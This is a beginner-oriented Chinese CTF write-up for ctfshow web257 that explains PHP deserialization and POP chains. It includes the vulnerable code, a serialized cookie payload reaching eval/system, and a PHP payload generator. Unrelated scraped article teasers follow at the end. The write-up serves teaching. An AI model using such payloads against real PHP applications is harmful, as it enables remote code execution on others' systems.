ctfshow-web257【保姆级wp】

写在最前:我发现现在网络上好多wp都是直接讲题目是怎么做的,可能对知道关于这道题中所讲的方法的一些前置知识人来说确实既是一个节约时间又能提供一个具体思路的好的writeup,但是对于我这样啥都不懂的人来说反而找不到真正适合的题解,要花大量的时间去找,去了解关于这道题目的前置知识,这对于一个自学者来说是最艰难也是最折磨的地方。因此,我希望我写的wp不仅仅是说这道题该怎么做,更是让一个完全没有基础的人也能看懂,而不是去反复的问AI这是啥意思,既是个人对零散知识的整合梳理,也是作为真正的萌新向wp。  【如果想详细了解可参阅php手册类与对象


一:前置知识

1.三种修饰符

修饰符类内部子类类外
public
protected
private

这里打勾代表能访问,这么看着其实有点一头雾水,还是举个栗子:

class A { private $x = 1; } $a = new A(); echo $a->x; // ❌ 报错:不能从外部访问 private 
  •  外部不能访问
  • 子类不能访问
  • 只有 A 类内部 能访问

在 PHP 里,不同权限的属性,序列化名字是不一样的

属性定义序列化里的名字
public $aa
protected $a\0*\0a
private $a\0类名\0a

这里其实可以参考之前我写的web255,当时构造的payload是这样的:

O:11:"ctfShowUser":3:{ s:8:"username";s:6:"xxxxxx"; s:8:"password";s:6:"xxxxxx"; s:5:"isVip";b:1; }

可以看到是直接写usernamepassword,这是因为那时候的定义的时候用的是public:

class ctfShowUser{ // 公共属性:用户名,默认值是 xxxxxx public $username='xxxxxx'; // 公共属性:密码,默认值是 xxxxxx public $password='xxxxxx'; // 是否是 VIP,默认 false(不是 VIP) public $isVip=false; // 检查当前对象是不是 VIP public function checkVip(){ // $this 指的是“当前这个对象” // 返回对象里的 isVip 属性 return $this->isVip; } 

而在这里定义时用的则是private,因此最前面要加上类名,具体的还是到后面题目中去看

2.普通方法名

“普通方法名”= 程序员自己随便起的函数名字,就比如说:

class A { function abc() {} function getInfo() {} function helloWorld() {} function 你开心就好() {} } 

这些都代表的是一个函数名字,abcgetinfo这类,这里就要区别于php的魔术方法,这些是不能改动的:

__construct // 构造函数 __destruct // 析构函数 __wakeup __toString 

之所以讲这个也是因为跟题目有关,慢慢看下去就了解了。

3.POP链

POP 链(Property-Oriented Programming)是通过“控制对象的属性”,利用已有类的魔术方法,在反序列化过程中自动执行危险代码。POP链能存在的原因是因为有unserialize() —— 自动创建对象和魔术方法 —— 自动执行。

基本结构:

一个完整的POP链是三段式:

[入口] → [传递] → [危险点] class A { public $b; function __destruct() { $this->b->run(); } } class B { public $c; function run() { eval($this->c); } } 

这里我们需要的是B里面的c去执行eval,但是B中没有任何魔术方法,而POP链中只有被程序自动调用的类才有机会去执行代码,因此我们要从A开始,构造的payload为:

O:1:"A":1:{ s:1:"b"; O:1:"B":1:{ s:1:"c"; s:10:"phpinfo();"; } } 

这样一个POP链形式的序列化字符串就形成了。


二:具体题目

给的代码如下:

<?php // ======================= // 用户类(POP 链的入口) // ======================= class ctfShowUser{ // 私有属性:用户名 // ⚠️ private:外部不能直接访问 // ⚠️ 反序列化时需要写成 \0ctfShowUser\0username private $username = 'xxxxxx'; // 私有属性:密码 private $password = 'xxxxxx'; // 私有属性:是否 VIP private $isVip = false; // 私有属性:保存一个“对象” // 表面上是 info,实际上可以被反序列化替换 private $class = 'info'; // 构造函数 public function __construct(){ // 正常情况下: // 每次 new ctfShowUser(),都会把 $class 设成 info 对象 $this->class = new info(); } // 登录函数 public function login($u, $p){ // 只是做字符串比较 // ❗ 返回值没有被 if 判断 // ❗ 成功 or 失败都不影响后续流程 return $this->username === $u && $this->password === $p; } // 析构函数(POP 链触发点) public function __destruct(){ // ⚠️ 关键危险点 // 程序“假设” $this->class 是 info 对象 // 但攻击者可以把它换成 backDoor 对象 $this->class->getInfo(); } } // ======================= // 正常信息类(安全) // ======================= class info{ // 私有属性 private $user = 'xxxxxx'; // 普通方法 public function getInfo(){ // 只是返回字符串 // ✔ 安全 return $this->user; } } // ======================= // 后门类(危险 Gadget) // ======================= class backDoor{ // 私有属性:存放攻击者的代码 private $code; // 与 info 同名的方法 public function getInfo(){ // ⚠️ 危险函数 // $this->code 完全可控(通过反序列化) eval($this->code); } } // ======================= // 主程序逻辑 // ======================= // 从 GET 获取参数(字符串) $username = $_GET['username']; $password = $_GET['password']; // 只要参数存在就进入 if (isset($username) && isset($password)) { // ⚠️ 致命漏洞 // 直接反序列化用户可控的 Cookie // 且没有 allowed_classes 限制 $user = unserialize($_COOKIE['user']); // 调用 login // ❗ login 成功与否不影响攻击 $user->login($username, $password); } 

这里就看到定义的时候用的是private,那么后面我们构造序列化字符串时就要加上类名了。

然后这里有两个getinfo,而getInfo() 执行的内容,取决于当前对象是哪个类的对象,这里我们需要的是含有eval的那个getinfo,所以我们要调用的就是backDoor,因此这里构造的payload则为:

O:11:"ctfShowUser":1:{s:18:"ctfShowUserclass";O:8:"backDoor":1:{s:14:"backDoorcode";s:23:"system("tac+flag.php");";}}

然后URL编码一下就可以了【我这里没写username和password,因此get里面传的就是默认值】

但是这里有个问题是我一个个手打过去很麻烦,可不可以编个程序跑一下,当然是可以的:

<?php class ctfShowUser{ private $class; public function __construct(){ $this->class=new backDoor(); } public function __destruct(){ $this->class->getInfo(); } } class backDoor{ private $code = "system('cat flag.php');"; public function getInfo(){ eval($this->code); } } echo urlencode(serialize(new ctfShowUser())); ?>

【其实这种序列化脚本还是挺简单的,照着题目给的改一下就行,都是公式化写法】

然后跑出来是这样的:

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D 

hackbar里加个cookie写一下就行了,记得get传参的两个。

三:总结

通过这道题,其实我们并不是“学会了某一道 CTF 题”,而是完整走了一遍 PHP 反序列化漏洞的学习路径。如果用一句话概括这类题目,那就是:

攻击者并不是在“执行代码”,而是在“构造对象结构”,
程序自己会沿着既定逻辑把危险代码跑完。

下面从几个关键点来回顾。


1. private 并不是“防御”,只是“增加构造难度”

在很多新人的直觉里,private 会让人觉得“更安全”。
但在反序列化漏洞中:

  • private / protected / public都可以被反序列化控制
  • 区别只在于:
    序列化字符串里字段名怎么写

真正要记住的是这张表:

属性类型序列化里的名字
publica
protected\0*\0a
private\0类名\0a

所以这道题里:

private $class;

必须写成:

"\0ctfShowUser\0class"

 private 不是挡住你,而是逼我们“写对格式”


2.普通方法名 ≠ 魔术方法,真正“自动执行”的只有魔术方法

getInfo()run() 这种:

  • 只是 普通函数名
  • 不会自动执行
  • 必须有人去“调用它”

而真正关键的是这些 魔术方法

__construct __destruct __wakeup __toString

在这道题里,真正触发整个 POP 链的只有一句:

public function __destruct(){ $this->class->getInfo(); }

也就是说:

不是 getInfo() 危险,而是“谁在什么时候调用了它”

3.POP 链的本质:不是“危险函数”,而是“执行路径”

很多初学者会下意识去找:

  • eval
  • system
  • exec

但真正的分析顺序应该是:

  1. 程序一定会自动执行谁?
  2. 它会调用哪个属性 / 方法?
  3. 这个属性能不能被我替换成别的对象?
  4. 最终有没有走到危险函数?

所以一条标准 POP 链一定是:

入口(魔术方法) ↓ 中间对象(方法被调用) ↓ 危险点(eval / system)

在本题中对应关系是:

角色
POP 链入口ctfShowUser::__destruct
中间桥梁$this->class->getInfo()
执行点backDoor::getInfo → eval()

4.为什么一定要“从 ctfShowUser 开始构造对象”

原因只有一句话:

只有被程序“自动调用”的类,才有机会执行代码
  • backDoor 里虽然有 eval
  • 但程序 从来不会自动调用 backDoor
  • 它只是一个“工具类”

所以 payload 的最外层 必须是 ctfShowUser
让程序在脚本结束时自动触发 __destruct()
再一步步把执行流程“引到 backDoor”。


5.手写 payload 很痛苦,用 PHP 自动生成才是正解

手打序列化字符串的问题在于:

  • private 字段容易写错
  • 字符串长度容易错
  • 嵌套对象非常反人类

而用 PHP 本身来生成 payload:

echo urlencode(serialize(new ctfShowUser()));

好处是:

  • PHP 自动帮我们处理 \0类名\0属性
  • 不用管字符串长度
  • 结构 100% 合法

 这不是“偷懒”,而是标准做法


6.这道题真正学到的东西

如果把这道题抽象掉细节,那么我们掌握的是:

  • PHP 类 / 对象 / 访问修饰符的基本语义
  • private 属性在反序列化中的表现形式
  •  魔术方法在 POP 链中的作用
  • 为什么“有 eval ≠ 能 RCE”
  • 如何从源码逆推出 payload 结构
  • 如何用脚本而不是手算生成 payload

这些能力是 可以迁移到绝大多数 PHP 反序列化题目中的

Read more

【verilog语法详解:从入门到精通】

【verilog语法详解:从入门到精通】

verilog语法详解:从入门到精通 * 一、Verilog 核心定位与语法框架 * 二、基础语法:模块与端口 * 三、核心数据类型 * 四、逻辑描述:组合逻辑与时序逻辑 * 五、常用运算符 * 六、控制流语句 * 七、进阶特性:任务与函数、生成块 * 八、语法规范与常见错误 * 九、总结 一、Verilog 核心定位与语法框架 1. 核心特点 并行性:模块内的所有语句(如 assign、always 块)同时执行(对应硬件的并行工作),而非按代码顺序执行。 硬件映射:每段语法都对应明确的硬件(如 reg 对应寄存器,wire 对应导线,and 对应与门)。 层次化:通过

安路Anlogic FPGA下载器的驱动安装与测试教程

安路Anlogic FPGA下载器的驱动安装与测试教程

参考链接:安路下载器JTAG驱动安装 - 米联客(milianke) - 博客园 安路支持几款下载器: AL-LINK在线下载器是基于上海安路信息科技股份科技有限公司全系列 CPLD/FPGA 器件,结合公司自研的 TD 软件,可实现在线 JTAG 程序下载、ChipWatcher 在线调试、FLASH 读写、Device Chain 模式烧录。下载器配合 USB-B 数据线、2.54mm 间距 10 针扁平线使用,实物如图所示 1.下载并安装软件 工具与资料下载-国产FPGA创新者 - 安路科技 (需要注册登录) 2.安装驱动 当完成TD软件安装后,可以在安装路径下找到对应驱动。 2.1 右击anlocyusb.inf选择安装: 2.2

企业微信外部群“群机器人”主动推送消息实现指南

QiWe开放平台 · 开发者名片                 API驱动企微自动化,让开发更高效         核心能力:企微二次开发服务 | 多语言接入 | 免Root授权         官方站点:https://www.qiweapi.com(功能全景)         开发文档:https://doc.qiweapi.com(开发指南)         团队定位:专注企微API生态的技术服务团队        对接通道:搜「QiWe 开放平台」联系客服         核心理念:合规赋能,让企微开发更简单、更高效 在企业微信的生态开发中,针对外部群(包含微信用户的群聊)进行自动化消息推送,最稳健且合规的方式是利用群机器人(Webhook)。本文将从技术逻辑、核心步骤及注意事项三个维度,分享如何实现这一功能。 一、 实现逻辑简述 企业微信外部群机器人主要通过一个唯一的 Webhook 地址 接收标准的 HTTP POST 请求。开发者只需将构造好的

宇树科技机器人核心技术

宇树科技机器人核心技术

前言 宇树科技作为全球足式/人形机器人领域的标杆企业,其技术体系覆盖消费级(Go2)、工业级(B2)、人形(G1/H1)全产品线,以“硬件自研+软件全栈+AI赋能”构建核心壁垒。本文不仅拆解宇树机器人的关键技术(单硬件、单软件、软硬件协同、AI+),还配套就业技能图谱、学习路线与工具推荐,适合机械、电子、计算机、AI领域开发者/求职者参考。 一、宇树科技机器人核心技术全景(附插图建议) 宇树的技术体系可概括为“四层金字塔结构”,从下到上实现“能运动→会运动→智能运动”的进阶: 技术层级核心定位代表技术应用价值底层硬件机器人“躯体骨架”自研伺服电机、分层计算平台、4D激光雷达保障运动性能与环境适配性全栈软件机器人“智慧大脑”MPC/WBC控制算法、SLAM感知融合、ROS2中间件实现精准控制与灵活交互软硬件协同机器人“神经中枢”实时控制闭环、